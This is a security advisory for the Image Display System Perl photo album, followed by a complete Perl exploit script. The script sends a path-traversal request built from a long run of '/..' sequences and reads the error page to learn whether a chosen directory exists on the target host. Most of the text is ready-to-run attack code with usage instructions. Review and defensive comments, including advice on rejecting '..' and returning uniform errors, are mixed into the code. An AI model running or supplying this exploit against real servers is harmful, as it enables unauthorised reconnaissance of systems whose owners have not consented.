
source: https://www.securityfocus.com/bid/4870/info
IDS (Image Display System) is a web-based photo album application written in Perl. IDS is freely available and is maintained by Ashley M. Kirchner.
Remote users can confirm the existence and location of directories on the IDS host. When a request for a directory and album name contains numerous '../' character sequences, the error page that IDS returns differs depending on whether the specified path is a valid directory, which tells the attacker whether that directory exists.
#!/usr/bin/perl -w
#
# ids-inform.pl (05/27/2002)
#
# Image Display System 0.8x Information Disclosure Exploit.
# Checks for existance of specified directory.
#
# By: isox [isox@chainsawbeer.com]
#
#
# usage: self explanitory
#
# my spelling: bad
#
# Hi Cody, You should be proud, I coded for you!
# Hi YpCat, Your perl is k-rad and pheersom.
#
#######
# URL #
#######
# http://0xc0ffee.com
# http://hhp-programming.net
#
#
#################
# Advertisement #
#################
#
# Going to Defcon X this year? Well come to the one and only Dennys at Defcon breakfast.
# This is quickly becoming a yearly tradition put on by isox. Check 0xc0ffee.com for
# more information.
#

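# Main flow: build one request whose album parameter is the requested
# directory name prefixed with a run of "/.." components, send it through
# Directory(), and classify the reply by the error text it contains.
#
# Defensive note: the signal exists only because the application answers
# differently for valid and invalid paths. Rejecting ".." in the album
# parameter and returning one uniform error message removes it; long runs of
# "/.." in the album query parameter are also easy to spot in web server logs.

# Number of "/.." components placed in front of the requested directory name.
my $maxdepth = 30;

# Called with parentheses: the legacy "&Banner;" form implicitly shares the
# caller's @_ with the sub.
Banner();

# Four positional arguments are required: directory, CGI URL, host, port.
if (@ARGV < 4) {
    die("Usage $0 <directory> <http://host/path/to/index.cgi> <host> <port>\n");
}

my ($directory, $cgi_url, $host, $port) = @ARGV;

# The repetition operator builds the same prefix the original loop produced,
# without concatenating onto an undefined variable (which warns under -w).
my $dotdot = "/.." x $maxdepth;

# The request text is unchanged from the original tool.
my $query = "GET $cgi_url" . "?mode=album&album=$dotdot/$directory\n\n";
my $response = Directory($query, $host, $port);

# An empty or missing reply must not trigger an "uninitialized value" warning
# in the match below.
$response = '' unless defined $response;

# NOTE(review): only the presence of this one error string is tested. Any
# other outcome (empty reply, a different error page, a patched server) also
# lands in the "Does Not Exist" branch, so that answer is inconclusive rather
# than proof of absence.
if ($response =~ /Sorry, invalid directory name/) {
    print("$directory Exists.\n");
}
else {
    print("$directory Does Not Exist.\n");
}

exit 0;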
# Banner: writes the tool name and author credit to standard output.
# Takes no arguments; the return value is that of the print call.
sub Banner {
    print "IDS Information Disclosure Exploit\n",
          "Written by isox [isox\@chainsawbeer.com]\n\n";
}
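# Directory: sends a prepared request to a TCP service and returns the reply.
#
# Parameters:
#   $query - the complete request text, written to the socket verbatim
#   $host  - peer address passed to IO::Socket::INET
#   $port  - peer port passed to IO::Socket::INET
#
# Returns up to 8192 bytes read from the peer (an empty string when the peer
# sends nothing). Dies when the connection, the write or the read fails.
sub Directory {
    # Kept inside the sub as in the original; "use" is processed at compile
    # time wherever it appears.
    use IO::Socket::INET;

    my ($query, $host, $port) = @_;

    # Direct method call instead of the indirect-object form "new Class (...)",
    # and a lexical handle instead of a package global.
    my $sock = IO::Socket::INET->new(
        PeerAddr => $host,
        PeerPort => $port,
        Timeout  => 8,
        Proto    => 'tcp',
    );

    # The constructor fails for refused connections and unresolvable hosts as
    # well as timeouts, so report the reason it left in $@ rather than always
    # claiming a timeout.
    if (!$sock) {
        die("sock: connect to $host:$port failed: $@\n");
    }

    print {$sock} $query
        or die("sock: write failed: $!\n");

    # NOTE(review): the Timeout above appears to bound only the connection
    # attempt; this read waits until 8192 bytes arrive or the peer closes.
    my $buf = '';
    defined(read($sock, $buf, 8192))
        or die("sock: read failed: $!\n");
    close($sock);

    return $buf;
}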
<-- EOF --> |